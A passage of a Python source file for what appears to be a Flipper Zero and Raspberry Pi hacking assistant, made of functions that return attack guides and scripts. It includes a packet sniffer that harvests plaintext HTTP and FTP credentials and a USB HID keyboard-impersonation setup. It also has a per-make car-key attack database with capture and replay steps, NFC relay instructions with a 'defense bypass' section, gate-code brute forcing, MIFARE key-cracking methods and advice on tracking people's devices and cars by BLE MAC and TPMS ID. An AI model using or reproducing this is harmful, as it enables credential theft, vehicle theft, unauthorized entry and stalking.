 GND (25) (26) GP7     SPI CE1
 GP0 (27) (28) GP1     ID EEPROM
 GP5 (29) (30) GND
 GP6 (31) (32) GP12    PWM0
GP13 (33) (34) GND     PWM1
GP19 (35) (36) GP16
GP26 (37) (38) GP20
 GND (39) (40) GP21

Hacking Peripherals:
  PN532 NFC: SPI/I2C -> GPIO 10,9,11,8 or 2,3
  CC1101 Sub-GHz: SPI -> GPIO 10,9,11,8 + GPIO 25
  nRF24L01: SPI -> GPIO 10,9,11,8 + GPIO 17
  ESP8266/ESP32: UART -> GPIO 14,15
  HackRF/RTL-SDR: USB
  WiFi Adapter: USB (monitor mode)"""


def rpi_hid_attack_script():
    return """#!/bin/bash
# Raspberry Pi USB HID Attack (P4wnP1-style)
# Turns RPi Zero/Zero 2W into a USB attack platform

echo "=== P4wnP1 A.L.O.A. Setup ==="
echo "1. Download: https://github.com/RoganDawes/P4wnP1_aloa"
echo "2. Flash to SD card with Raspberry Pi Imager"
echo "3. Boot RPi Zero 2W with USB data cable"
echo "4. Connect to WiFi: P4wnP1 / MaMe82-P4wnP1"
echo "5. Web UI: http://172.24.0.1:8000"

echo "=== Manual USB Gadget ==="
# Enable USB gadget mode in /boot/config.txt:
# dtoverlay=dwc2
# In /boot/cmdline.txt add: modules-load=dwc2,libcomposite

cat > /usr/local/bin/usb_hid_setup.sh << 'GADGET'
#!/bin/bash
cd /sys/kernel/config/usb_gadget/
mkdir -p g1 && cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
mkdir -p strings/0x409
echo "PocketHacker" > strings/0x409/manufacturer
echo "USB Keyboard" > strings/0x409/product
mkdir -p functions/hid.usb0
echo 1 > functions/hid.usb0/protocol
echo 1 > functions/hid.usb0/subclass
echo 8 > functions/hid.usb0/report_length
echo -ne '\x05\x01\x09\x06\xa1\x01\x05\x07\x19\xe0\x29\xe7\x15\x00\x25\x01\x75\x01\x95\x08\x81\x02\x95\x01\x75\x08\x81\x03\x95\x05\x75\x01\x05\x08\x19\x01\x29\x05\x91\x02\x95\x01\x75\x03\x91\x03\x95\x06\x75\x08\x15\x00\x25\x65\x05\x07\x19\x00\x29\x65\x81\x00\xc0' > functions/hid.usb0/report_desc
mkdir -p configs/c.1/strings/0x409
echo "Config 1: HID" > configs/c.1/strings/0x409/configuration
ln -s functions/hid.usb0 configs/c.1/
ls /sys/class/udc > UDC
GADGET
chmod +x /usr/local/bin/usb_hid_setup.sh

echo "[*] Reboot to activate. Then run: sudo /usr/local/bin/usb_hid_setup.sh"
"""


def rpi_wardriving_setup():
    return """#!/bin/bash
# Raspberry Pi Wardriving Setup
# GPS + WiFi scanning for mapping wireless networks
sudo apt update
sudo apt install -y gpsd gpsd-clients kismet aircrack-ng python3-gps

# GPS Setup (USB GPS module):
sudo systemctl enable gpsd
sudo gpsd /dev/ttyUSB0 -F /var/run/gpsd.sock

# Kismet config:
cat > /etc/kismet/kismet_site.conf << 'KISMET'
source=wlan1:name=wardriving
gps=gpsd:host=localhost,port=2947
log_types=kismet,pcapng,wiglecsv
log_prefix=/home/pi/wardriving
KISMET

echo "[*] Start: sudo kismet"
echo "[*] Web UI: http://localhost:2501"
echo "[*] Upload results to WiGLE.net"
"""


def rpi_packet_sniffer():
    return """#!/usr/bin/env python3
# Network Packet Sniffer for Raspberry Pi
# Requires: scapy (pip3 install scapy)
from scapy.all import *
from collections import defaultdict
import sys

class PacketSniffer:
    def __init__(self, iface='wlan0'):
        self.iface = iface
        self.packets = []
        self.stats = defaultdict(int)
        self.credentials = []
        self.dns_queries = []

    def packet_handler(self, pkt):
        self.packets.append(pkt)
        if pkt.haslayer(TCP):
            self.stats['TCP'] += 1
            dport = pkt[TCP].dport
            if dport == 80:
                self.stats['HTTP'] += 1
                if pkt.haslayer(Raw):
                    payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                    if any(k in payload.lower() for k in ['user','pass','login','email','token']):
                        src = pkt[IP].src if pkt.haslayer(IP) else '?'
                        self.credentials.append(f'[HTTP] {src}: {payload[:200]}')
            elif dport == 443: self.stats['HTTPS'] += 1
            elif dport == 21:
                self.stats['FTP'] += 1
                if pkt.haslayer(Raw):
                    payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                    if payload.startswith(('USER ','PASS ')):
                        self.credentials.append(f'[FTP] {pkt[IP].src}: {payload.strip()}')
        elif pkt.haslayer(UDP): self.stats['UDP'] += 1
        if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
            self.stats['DNS'] += 1
            self.dns_queries.append(pkt[DNSQR].qname.decode())
        if pkt.haslayer(ARP): self.stats['ARP'] += 1

    def start(self, count=0, timeout=None):
        print(f"[*] Sniffing on {self.iface}...")
        try:
            sniff(iface=self.iface, prn=self.packet_handler, count=count, timeout=timeout, store=0)
        except KeyboardInterrupt: pass
        self.print_summary()

    def print_summary(self):
        print(f"\nCapture Summary ({len(self.packets)} packets)")
        for proto, count in sorted(self.stats.items(), key=lambda x: -x[1]):
            print(f"  {proto}: {count}")
        if self.credentials:
            print(f"\nCaptured Credentials ({len(self.credentials)}):")
            for c in self.credentials: print(f"  {c}")
        if self.dns_queries:
            unique = list(dict.fromkeys(self.dns_queries))[:20]
            print(f"\nDNS Queries (top {len(unique)}):")
            for q in unique: print(f"  {q}")

if __name__ == '__main__':
    PacketSniffer(sys.argv[1] if len(sys.argv) > 1 else 'wlan0').start()
"""


# === iButton ===

IBUTTON_TYPES = {
    "cyfral": {"name": "Cyfral", "bits": 16, "desc": "Cyfral intercom keys. Common in Eastern Europe."},
    "dallas": {"name": "Dallas/DS1990A", "bits": 64, "desc": "1-Wire iButton. Most common type. 48-bit unique ID."},
    "metakom": {"name": "Metakom", "bits": 32, "desc": "Metakom intercom keys. Common in Russia/CIS."}
}


def generate_ibutton_file(uid, protocol="dallas"):
    uid_hex = uid.replace(":", " ").replace("-", " ").upper()
    proto_map = {"dallas": "DS1990", "cyfral": "Cyfral", "metakom": "Metakom"}
    proto_name = proto_map.get(protocol.lower(), "DS1990")
    return f"Filetype: Flipper iButton key\nVersion: 1\nProtocol: {proto_name}\nData: {uid_hex}\n"


def ibutton_info():
    lines = ["iButton Types:\n"]
    for key, t in IBUTTON_TYPES.items():
        lines.append(f"  * {key}: {t['name']} -- {t['desc']}")
    lines.append("\nUsage: /ibutton <uid> [protocol]")
    lines.append("Flipper: iButton > Read > hold iButton to reader")
    return "\n".join(lines)


# === Flipper Zero Firmware / Info ===

FLIPPER_FIRMWARES = {
    "official": {"name": "Official Flipper Firmware", "url": "https://github.com/flipperdevices/flipperzero-firmware", "desc": "Stock firmware. Stable but limited. No Sub-GHz region bypass."},
    "unleashed": {"name": "Unleashed Firmware", "url": "https://github.com/DarkFlippers/unleashed-firmware", "desc": "Most popular custom FW. Region bypass, extra protocols, rolling code."},
    "rogue_master": {"name": "RogueMaster Firmware", "url": "https://github.com/RogueMaster/flipperzero-firmware-wPlugins", "desc": "Feature-packed. Tons of plugins, apps, animations."},
    "xtreme": {"name": "Momentum/Xtreme Firmware", "url": "https://github.com/Next-Flip/Momentum-Firmware", "desc": "Clean UI, asset packs, powerful Sub-GHz, BLE spam built-in."}
}


def flipper_firmware_info():
    lines = ["Flipper Zero Firmware Options:\n"]
    for key, fw in FLIPPER_FIRMWARES.items():
        lines.append(f"  {fw['name']}")
        lines.append(f"    {fw['desc']}")
        lines.append(f"    {fw['url']}\n")
    lines.append("Recommended: Unleashed or Momentum for hacking")
    return "\n".join(lines)


def flipper_file_structure():
    return """Flipper Zero SD Card Structure:

/ext/
  apps/           Extra .fap applications
  apps_data/      App settings & data
  badusb/         BadUSB .txt scripts (DuckyScript)
  infrared/       IR .ir remote files
  lfrfid/         LF RFID .rfid files
  nfc/            NFC .nfc files + MIFARE key dicts
  subghz/         Sub-GHz .sub files + assets
  ibutton/        iButton .ibtn files
  music_player/   .fmf music files
  update/         Firmware updates
  dolphin/        Dolphin level/stats

Key file types:
  .sub  = Sub-GHz signals (record > replay)
  .nfc  = NFC card dumps (read > emulate > write)
  .rfid = LF RFID keys (read > emulate/write)
  .ir   = Infrared signals (learn > transmit)
  .ibtn = iButton keys (read > emulate/write)
  .txt  = BadUSB scripts (DuckyScript format)
  .fap  = Flipper applications (compiled plugins)"""


# === Common RF Frequencies ===

COMMON_FREQUENCIES = {
    "125": {"freq": "125 kHz", "use": "LF RFID (EM4100, HID Prox)"},
    "300": {"freq": "300.00 MHz", "use": "Garage doors (US old), some security systems"},
    "310": {"freq": "310.00 MHz", "use": "Linear/Firefly garage openers (US)"},
    "315": {"freq": "315.00 MHz", "use": "Car key fobs (US/Japan), garage doors, TPMS"},
    "390": {"freq": "390.00 MHz", "use": "Chamberlain/LiftMaster (US)"},
    "418": {"freq": "418.00 MHz", "use": "Security sensors, some car systems"},
    "433": {"freq": "433.92 MHz", "use": "Most common! Gates, remotes, weather stations, car keys (EU)"},
    "868": {"freq": "868.35 MHz", "use": "European frequency. Hormann, FAAC, smart home"},
    "915": {"freq": "915.00 MHz", "use": "US ISM band. LoRa, IoT devices, smart meters"},
    "1575": {"freq": "1575.42 MHz", "use": "GPS L1 frequency"},
    "2400": {"freq": "2.4 GHz", "use": "WiFi, Bluetooth, Zigbee, wireless keyboards, drones"},
    "5000": {"freq": "5 GHz", "use": "WiFi 5/6, modern routers"},
    "5800": {"freq": "5.8 GHz", "use": "FPV drones, video transmitters, radar detectors"}
}


def frequency_info(freq=None):
    if freq:
        freq_str = str(freq).replace(" ", "").lower().replace("mhz", "").replace("ghz", "000").replace("khz", "")
        freq_clean = freq_str.split(".")[0] if "." in freq_str else freq_str
        for key, info in COMMON_FREQUENCIES.items():
            if key == freq_clean or freq_str in info["freq"].lower():
                return f"{info['freq']}\nUse: {info['use']}"
        return f"Frequency {freq} not in database.\n\n" + frequency_info()
    lines = ["Common RF Frequencies:\n"]
    for key, info in COMMON_FREQUENCIES.items():
        lines.append(f"  {info['freq']:>12} -- {info['use']}")
    return "\n".join(lines)


def jamming_info():
    return """RF Jamming Reference (Educational Only)

WARNING: Jamming is ILLEGAL in most countries.

How it works:
  Transmit noise on target frequency to overwhelm legitimate signals.

Common targets:
  WiFi: 2.4/5 GHz (deauth frames = legal gray area)
  Cellular: 700-2700 MHz (VERY illegal, blocks 911)
  Car keys: 315/433 MHz (used in relay attacks)
  GPS: 1575.42 MHz (illegal, affects aviation)
  Drones: 2.4/5.8 GHz (forces return-to-home)

Flipper Zero can:
  Detect and analyze RF signals
  Record and replay signals
  CANNOT jam (too low power)

Testing tools (with authorization):
  HackRF One: 1MHz-6GHz, $350
  YARD Stick One: Sub-GHz, $100
  ESP32 Marauder: WiFi deauth only, $15

Legal alternatives:
  Faraday bags/cages for signal blocking
  WiFi deauth for YOUR OWN network testing"""


# === Universal File Generator ===

def flipper_generate(file_type, **kwargs):
    generators = {
        "sub": lambda: generate_sub_file(kwargs.get("protocol", "princeton"), kwargs.get("frequency"), kwargs.get("bits"), kwargs.get("code", "0"), kwargs.get("te")),
        "nfc": lambda: generate_nfc_file(kwargs.get("uid", "04 01 02 03 04 05 06"), kwargs.get("protocol", "mifare_classic_1k")),
        "rfid": lambda: generate_rfid_file(kwargs.get("uid", "01 02 03 04 05"), kwargs.get("protocol", "em4100")),
        "ir": lambda: generate_ir_file(kwargs.get("device", "tv")),
        "ibtn": lambda: generate_ibutton_file(kwargs.get("uid", "01 02 03 04 05 06 07 08"), kwargs.get("protocol", "dallas")),
        "badusb": lambda: generate_duckyscript(kwargs.get("template", "rickroll"), lhost=kwargs.get("lhost", "ATTACKER_IP"), lport=kwargs.get("lport", "4444")),
    }
    if file_type not in generators:
        return f"Unknown file type: {file_type}\nSupported: {', '.join(generators.keys())}"
    return generators[file_type]()


# === Car Key / Vehicle Signal Database ===

CAR_KEY_DB = {
    # US Cars - 315 MHz
    "toyota": {"freq": "315 MHz", "protocol": "Rolling Code (Toyota proprietary)", "type": "Smart Key / Proximity", "attack": "RollJam, Relay Attack", "notes": "2018+ uses BLE+UWB. Older models 315MHz OOK."},
    "honda": {"freq": "315 MHz", "protocol": "Rolling Code", "type": "Smart Key", "attack": "Rolling-PWN (CVE-2022-27254), Replay on some models", "notes": "2012-2022 vulnerable to Rolling-PWN attack. Sends 10 rolling codes."},
    "ford": {"freq": "315 MHz", "protocol": "KeeLoq Rolling Code", "type": "Transponder + Remote", "attack": "Relay Attack, KeeLoq cryptanalysis", "notes": "FordPass uses BLE. Older = 315MHz KeeLoq."},
    "chevrolet": {"freq": "315 MHz", "protocol": "KeeLoq / Rolling", "type": "Key Fob", "attack": "Relay, RollJam", "notes": "GM uses KeeLoq variant. Some trucks brute-forceable."},
    "gmc": {"freq": "315 MHz", "protocol": "KeeLoq / Rolling", "type": "Key Fob", "attack": "Relay, RollJam", "notes": "Same as Chevrolet (GM platform)."},
    "dodge": {"freq": "315 MHz", "protocol": "Hitag AES", "type": "Smart Key", "attack": "Relay Attack", "notes": "Chrysler/Dodge uses Hitag transponder."},
    "jeep": {"freq": "315 MHz", "protocol": "Hitag AES", "type": "Smart Key", "attack": "Relay Attack, CAN injection", "notes": "Cherokee famously hacked in 2015 (remote CAN)."},
    "tesla": {"freq": "315 MHz (US) / 433 MHz (EU)", "protocol": "BLE + Passive Entry", "type": "Phone Key / Card / Fob", "attack": "BLE Relay (NCC Group 2022), Pin-to-Drive bypass", "notes": "Model 3/Y use BLE phone key. Card uses NFC 13.56MHz."},
    "nissan": {"freq": "315 MHz", "protocol": "Rolling Code", "type": "Intelligent Key", "attack": "Relay Attack", "notes": "I-Key uses 315MHz + 134kHz LF wake."},
    "subaru": {"freq": "315 MHz", "protocol": "Fixed Code (older) / Rolling", "type": "Key Fob", "attack": "Replay on pre-2017 Forester, Relay on newer", "notes": "Some older models use FIXED codes - trivially replayable."},
    # EU Cars - 433 MHz
    "bmw": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "Hitag2 / CAS", "type": "Comfort Access", "attack": "Relay Attack, CAS module clone", "notes": "Comfort Access uses 433MHz + LF 125kHz. Keyless theft common."},
    "mercedes": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "FBS4 Rolling", "type": "KEYLESS-GO", "attack": "Relay Attack, OBD key programming", "notes": "FBS4 is strongest. Older FBS3 cracked."},
    "audi": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "Megamos Crypto / AUT64", "type": "Advanced Key", "attack": "Relay Attack, Megamos Crypto broken", "notes": "VW Group. Megamos transponder cracked by researchers."},
    "volkswagen": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "Megamos / Hitag2", "type": "KESSY", "attack": "RollJam, Relay, Hitag2 cracked", "notes": "VW Group keyless vulnerable. Hitag2 broken since 2012."},
    "porsche": {"freq": "433 MHz", "protocol": "Hitag2 / PKES", "type": "Entry & Drive", "attack": "Relay Attack", "notes": "Same VW Group vulnerabilities."},
    "land_rover": {"freq": "433 MHz", "protocol": "Pektron Rolling", "type": "Smart Key", "attack": "Relay Attack, CAN injection", "notes": "Range Rover/Defender. Very commonly relay-stolen in UK."},
    "jaguar": {"freq": "433 MHz", "protocol": "Pektron Rolling", "type": "Smart Key", "attack": "Relay Attack", "notes": "Same as Land Rover (JLR group)."},
    "volvo": {"freq": "433 MHz", "protocol": "Rolling Code", "type": "PCC Key", "attack": "Relay Attack", "notes": "Newer models use CMA/SPA platform."},
    "hyundai": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "Rolling Code", "type": "Smart Key", "attack": "Replay on some 2017-2021, Relay", "notes": "Multiple CVEs for Kia/Hyundai USB port start."},
    "kia": {"freq": "433 MHz (EU) / 315 MHz (US)", "protocol": "Rolling Code / USB bypass", "type": "Smart Key", "attack": "USB bypass (TikTok Kia Boys), Relay", "notes": "2015-2021 no immobilizer chip = stolen via USB."},
    "mazda": {"freq": "315 MHz", "protocol": "Rolling Code", "type": "Key Fob", "attack": "Relay Attack", "notes": "Uses Atmel/Microchip crypto."},
    "lexus": {"freq": "315 MHz", "protocol": "Toyota proprietary", "type": "Smart Access", "attack": "Relay Attack", "notes": "Same as Toyota (parent company)."},
}


def car_key_lookup(make):
    """Look up car key frequency and attack info by make."""
    make = make.lower().strip().replace(" ", "_")
    if make in CAR_KEY_DB:
        c = CAR_KEY_DB[make]
        return (f" {make.upper()} Key Fob Info\n"
                f"Frequency: {c['freq']}\n"
                f"Protocol: {c['protocol']}\n"
                f"Type: {c['type']}\n"
                f"Known Attacks: {c['attack']}\n"
                f"Notes: {c['notes']}\n\n"
                f" To capture/replay:\n"
                f"  1. Flipper Zero > Sub-GHz > Read on correct freq\n"
                f"  2. HackRF One for advanced capture\n"
                f"  3. RTL-SDR to monitor signals")
    else:
        cars = "\n".join(f"  * {k}: {v['freq']} ({v['protocol']})" for k, v in CAR_KEY_DB.items())
        return f"Car not found: {make}\n\nSupported vehicles:\n{cars}"


def car_key_list():
    """List all cars with their key frequencies."""
    lines = [" Car Key Frequency Database:\n"]
    by_freq = {"315 MHz": [], "433 MHz": [], "Mixed": []}
    for make, info in CAR_KEY_DB.items():
        if "315" in info["freq"] and "433" in info["freq"]:
            by_freq["Mixed"].append(f"  {make}: {info['freq']}")
        elif "433" in info["freq"]:
            by_freq["433 MHz"].append(f"  {make}: {info['freq']}")
        else:
            by_freq["315 MHz"].append(f"  {make}: {info['freq']}")
    for freq, cars in by_freq.items():
        if cars:
            lines.append(f"\n {freq}:")
            lines.extend(cars)
    lines.append(f"\nTotal: {len(CAR_KEY_DB)} vehicles")
    lines.append("Usage: /carscan <make>  or just type 'toyota key frequency'")
    return "\n".join(lines)


# === iPhone Signal Scanner ===

def iphone_ble_scanner():
    """Generate iOS Shortcuts & apps for BLE device scanning."""
    return """ iPhone BLE Signal Scanner

Your iPhone can detect Bluetooth Low Energy devices around you:
car key fobs, AirTags, smart locks, fitness trackers, etc.

=== METHOD 1: iOS Shortcuts (No App Needed) ===
1. Open Shortcuts app
2. Create Automation > Bluetooth
3. Or use NFC Automation to trigger scans

=== METHOD 2: Free Apps for BLE Scanning ===

BLE Scanner (by Bluepixel Technologies)
  - See all BLE devices nearby
  - Shows signal strength (RSSI), UUID, services
  - Real-time distance estimation
  - FREE on App Store

nRF Connect (by Nordic Semiconductor)
  - Professional BLE scanner
  - Decode advertising data
  - Read/write GATT characteristics
  - Identify device types from UUIDs
  - FREE on App Store

LightBlue
  - Create virtual BLE peripherals
  - Scan and connect to BLE devices
  - Log signal data over time
  - FREE

=== METHOD 3: Detect Car Key Fobs via BLE ===

Modern cars (2019+) emit BLE beacons:
  - Tesla: Broadcasts BLE for phone key
  - BMW: Digital Key uses BLE + UWB
  - Audi/VW: Some models BLE proximity
  - Hyundai/Kia: Digital Key 2.0 BLE

Using nRF Connect:
  1. Open app > Scanner tab > Start
  2. Sort by RSSI (signal strength)
  3. Look for these manufacturer IDs:
     * 0x004C = Apple devices
     * 0x0075 = Samsung
     * 0x00E0 = Google
     * 0x0059 = Nordic Semi (many car systems)
     * Tesla shows as 'S%Model 3' or similar
  4. High RSSI = device is close to you
  5. Track RSSI changes to locate device

=== METHOD 4: WiFi Recon from iPhone ===

Network Analyzer (by Jiri Techet)
  - Scan WiFi networks with signal strength
  - Port scanner, ping, traceroute
  - DNS lookup, whois
  - FREE

Fing
  - Network device discovery
  - OS detection, open ports
  - WiFi signal mapping
  - FREE

=== METHOD 5: NFC Reading ===

iPhone 7+ has built-in NFC reader:
  1. Hold iPhone near NFC tag/card
  2. iOS reads NDEF data automatically
  3. For full dump use: NFC Tools (App Store)
  
NFC Tools app can:
  - Read tag UID, type, technology
  - Read/write NDEF records
  - Read MIFARE Ultralight pages
  - Works on transit cards, hotel keys, badges

=== SIGNAL STRENGTH GUIDE ===
RSSI (dBm) | Distance Estimate
   0 to -30  | < 1 meter (touching)
 -30 to -50  | 1-3 meters
 -50 to -70  | 3-10 meters
 -70 to -90  | 10-30 meters
 -90+        | > 30 meters (weak)

=== TIPS FOR SIGNAL HUNTING ===
  1. Walk slowly, watch RSSI values change
  2. Higher RSSI = closer to signal source
  3. Use triangulation: measure from 3 spots
  4. Metal/walls reduce signal ~10-20 dBm
  5. Car key fobs pulse every 0.5-2 seconds
  6. Save interesting device MACs for tracking"""


def iphone_nfc_read():
    """Guide for reading NFC with iPhone."""
    return """ iPhone NFC Card Reading

Built-in NFC (iPhone 7+):
  - Hold top of iPhone near card/tag
  - Works with: NDEF, ISO 14443, FeliCa

App: NFC Tools (Free on App Store)
  - Read: UID, ATQA, SAK, technology type
  - Read NDEF records (URLs, text, contacts)
  - Write NDEF to writable tags
  - Copy tag info for Flipper Zero

App: NFC TagInfo (by NXP)
  - Deep tag analysis
  - Memory dump (where supported)
  - IC identification
  - Standard compliance check

What iPhone CAN read:
  * Hotel key cards (MIFARE Ultralight)
  * Transit cards (FeliCa, DESFire)
  * NFC tags/stickers (NTAG, ICODE)
  * Payment cards (basic info only)
  * Access badges (UID only)
  * Amiibo (NTAG215)

What iPhone CANNOT do:
  * Read MIFARE Classic (Crypto-1)
  * Read LF RFID (125 kHz)
  * Emulate arbitrary cards
  * Write to protected sectors
  * Brute-force keys

Workflow with Flipper:
  1. Read UID with iPhone NFC Tools
  2. Note the UID, ATQA, SAK values  
  3. Use /nfc UID protocol to generate .nfc file
  4. Transfer .nfc file to Flipper SD card
  5. Flipper can emulate the card"""


def signal_scan_guide():
    """Complete signal detection guide using iPhone + hardware."""
    return """ Signal Scanning Guide

=== WHAT YOUR iPHONE CAN DETECT ===

 WiFi (2.4/5 GHz):
  App: Network Analyzer or Fing
  See: SSIDs, signal strength, channels, security
  Use: Find hidden networks, rogue APs, weak signals

 Bluetooth / BLE:
  App: nRF Connect or BLE Scanner
  See: All BLE devices, RSSI, services, manufacturer
  Use: Find car key fobs, trackers, smart locks

 NFC (13.56 MHz):
  Built-in: Hold phone to card
  App: NFC Tools
  See: UID, tag type, NDEF data
  Use: Read badges, transit cards, hotel keys

=== WHAT NEEDS EXTERNAL HARDWARE ===

 Sub-GHz (300-928 MHz) - Car keys, garage, gates:
  * Flipper Zero ($170) - Best portable
  * HackRF One ($350) - Wide range SDR
  * RTL-SDR ($25) - Receive only
  * YARD Stick One ($100) - Sub-GHz TX/RX
  Connect RTL-SDR to iPhone via USB adapter!

 LF RFID (125 kHz) - Access cards:
  * Flipper Zero - Read/emulate/write
  * Proxmark3 ($100) - Advanced RFID hacking
  * Cannot read with iPhone (wrong frequency)

=== RTL-SDR + iPHONE SETUP ===
Yes, you CAN use SDR with iPhone!
  1. Get RTL-SDR dongle ($25)
  2. Get Lightning/USB-C to USB adapter
  3. App: SDR Touch (limited iOS support)
  4. Better: Use RPi as SDR server
     - Install rtl_tcp on RPi
     - Connect SDR to RPi
     - iPhone connects via WiFi
     - App: SDR# client

=== DETECT CAR KEY SIGNALS ===
Method 1 - BLE (modern cars):
  Use nRF Connect on iPhone
  Walk near parked cars
  Look for BLE beacons from key fobs

Method 2 - Sub-GHz (most cars):
  Need: Flipper Zero or RTL-SDR
  315 MHz: US/Japan cars
  433 MHz: European cars
  Press key fob button near receiver
  Flipper: Sub-GHz > Read > observe

Method 3 - Passive monitoring:
  TPMS sensors broadcast at 315/433 MHz
  Readable with Flipper or RTL-SDR
  Shows tire pressure + unique sensor ID
  Can track specific vehicles by TPMS ID"""


#  MAXED OUT FLIPPER CAPABILITIES 

def marauder_wifi_attacks():
    return """
ESP32 MARAUDER (WiFi Board for Flipper Zero)

Required: ESP32-S2 or ESP32-WROOM (Marauder firmware)
Install: Flash via web installer at https://github.com/justcallmekoko/ESP32Marauder

ATTACKS:
  Scan         scan -a (all APs + clients)
  Deauth       attack -t deauth (deauth all)
  Beacon Spam  attack -t beacon -l (list SSIDs)
  Probe Flood  attack -t probe
  Rickroll     attack -t rickroll (beacon spam funny SSIDs)
  Evil Portal  ssid -a "Free WiFi" then attack -t beacon -l
  Sniff PMKID  sniff -t pmkid (capture WPA2 handshakes)
  Sniff Raw    sniff -t raw
  PCAP Save    capture saved to SD card as .pcap

FLIPPER GPIO WIRING (ESP32-S2):
  Flipper TX (13)  ESP32 RX
  Flipper RX (14)  ESP32 TX
  Flipper 5V       ESP32 VIN
  Flipper GND      ESP32 GND

FLIPPER APP:
  GPIO  ESP32  WiFi Marauder
  All commands accessible from Flipper screen
"""

def nfc_relay_attack():
    return """
NFC RELAY ATTACK (Flipper Zero)

Concept: Reader <-> Flipper A (proxy) <-> Flipper B (emulate) <-> Real Card

METHOD 1 - Flipper + Android (NFCGate):
  1. Install NFCGate on rooted Android
  2. Phone reads real card via NFC  relays data over internet
  3. Second phone emulates card at target reader
  Range: Unlimited (internet relay)

METHOD 2 - Two Flippers:
  1. Flipper A: NFC  Read, hold near target card
  2. Flipper B: NFC  Emulate saved card at reader
  3. Timing is key - must relay within auth timeout

TARGETS:
  - Building access cards (HID iClass, DESFire)
  - Transit cards
  - Hotel key cards
  - Payment cards (EMV - harder, has distance bounding)

DEFENSE BYPASS:
  - Rolling codes: Relay in real-time, no need to crack
  - Encryption: Transparent relay, no need to decrypt
  - Only stopped by distance-bounding protocols
"""

def subghz_fuzzing(protocol="all"):
    protocols = {
        "came": {"bits": 12, "te": 320, "freq": "433920000"},
        "nice_flo": {"bits": 12, "te": 700, "freq": "433920000"},
        "princeton": {"bits": 24, "te": 400, "freq": "433920000"},
        "linear": {"bits": 10, "te": 500, "freq": "300000000"},
        "gate_tx": {"bits": 24, "te": 350, "freq": "433920000"},
        "holtek": {"bits": 12, "te": 430, "freq": "433920000"},
        "chamberlain": {"bits": 9, "te": 1000, "freq": "300000000"},
    }
    if protocol != "all" and protocol in protocols:
        p = protocols[protocol]
        return f"""SUB-GHZ FUZZING: {protocol.upper()}
Bits: {p["bits"]} | TE: {p["te"]}us | Freq: {p["freq"]}
Total combinations: {2**p["bits"]}
Estimated time: {(2**p["bits"] * p["te"] * p["bits"]) / 1000000:.1f} seconds

On Flipper: Sub-GHz  Extra Actions  Frequency Analyzer
Then: Sub-GHz  Saved  BruteForce
Select .sub file with correct protocol"""
    result = "SUB-GHZ FUZZING PROTOCOLS:\n"
    for name, p in protocols.items():
        combos = 2**p["bits"]
        time_s = (combos * p["te"] * p["bits"]) / 1000000
        result += f"  {name}: {p['bits']} bits, {combos} codes, ~{time_s:.0f}s\n"
    return result

def flipper_u2f_info():
    return """
U2F / FIDO SECURITY KEY (Flipper Zero)

Flipper Zero can act as a U2F hardware security key!

SETUP:
  1. On Flipper: U2F  Register
  2. Open browser  Go to security settings of Google/GitHub/etc
  3. Add security key  Touch Flipper when prompted
  4. Flipper saves the key pair

SUPPORTED SITES:
  Google, GitHub, Twitter, Facebook, Dropbox, AWS
  Any site supporting FIDO U2F or WebAuthn

HOW IT WORKS:
  - Flipper generates unique key pair per site
  - Private key stays on Flipper, never leaves
  - Login: plug in Flipper USB  press button to confirm
  - Phishing-proof: key is bound to exact domain
"""

def flipper_gpio_tools():
    return """
GPIO MULTITOOL (Flipper Zero)

UART BRIDGE:
  GPIO  USB-UART Bridge  Select baud rate
  Connect: TXRX, RXTX, GNDGND
  Baud rates: 9600, 19200, 38400, 57600, 115200, 230400, 460800, 921600
  Use to: Access router consoles, debug IoT devices, read GPS modules

I2C SCANNER:
  GPIO  I2C Scanner  Scans all addresses 0x00-0x7F
  Connect: SDAC1, SCLC0, GNDGND
  Finds: EEPROM, sensors, displays, RTC chips

SPI READER:
  Read/write SPI flash chips
  Connect: MOSIB3, MISOB4, CLKB5, CSA4, GNDGND
  Dump: Full firmware extraction from IoT devices

VOLTAGE READER:
  GPIO  Analog Read  Shows voltage on pin
  Range: 0-3.3V on ADC pins

LOGIC ANALYZER:
  Install: Logic Analyzer app from Flipper app store
  8 channels, up to 1MHz sampling
  Decode: UART, SPI, I2C, 1-Wire protocols

SIGNAL GENERATOR:
  GPIO  Signal Generator
  Output: PWM, square wave, configurable frequency
  Use for: Testing circuits, driving servos
"""

def ir_fuzzing():
    return """
IR FUZZING / BRUTE FORCE (Flipper Zero)

UNIVERSAL REMOTE (built-in):
  IR  Universal Remote  Select device type
  Tries ALL known codes for: TVs, ACs, Projectors, Audio

BRUTE FORCE (custom):
  1. Use IR  Learn New Remote to capture protocol
  2. Note the protocol (NEC, Samsung, RC5, RC6, SIRC, etc)
  3. Generate .ir file with all command codes:

  Filetype: IR signals file
  Version: 1
  # Brute force all commands 0x00-0xFF
  name: cmd_000
  type: parsed
  protocol: NEC
  address: 04 00 00 00
  command: 00 00 00 00

  (repeat for each command value)

IR PROTOCOLS SUPPORTED:
  NEC, Samsung32, RC5, RC6, SIRC, Kaseikyo, Pioneer
  NEC42, NECext, Samsung48, RC5X, Pioneer, BOSE, Epson

TIPS:
  - Most TVs: NEC protocol, address auto-detected
  - ACs: Kaseikyo/Raw (complex state-based)
  - Point Flipper directly at IR receiver, close range
  - Hold steady during brute force (takes ~30s per set)
"""

def nfc_fuzzing():
    return """
NFC FUZZING (Flipper Zero + Unleashed/Momentum)

UID FUZZING:
  - Randomize UID each emulation attempt
  - Bypass UID-only access control
  - Works on cheap readers that only check UID

MIFARE CLASSIC ATTACKS:
  1. Dictionary Attack (built-in + custom dictionaries)
     NFC  Detect  Read with dictionary
     Place user dict at: /ext/nfc/assets/mf_classic_dict_user.nfc

  2. Nested Attack (if 1+ key known)
     Exploits weak PRNG in Classic chips
     Recovers all sector keys from 1 known key

  3. Hardnested Attack (even on fixed-nonce cards)
     Available in Momentum/Unleashed firmware
     Slower but works on patched cards

  4. Darkside Attack (no keys needed)
     Exploits PRNG vulnerability
     Works on original Mifare Classic only

NTAG/ULTRALIGHT:
  - Full read/write of NTAG 213/215/216
  - Amiibo emulation (NTAG215)
  - Password brute force for locked tags

DESFIRE:
  - Read public data (UID, app IDs)
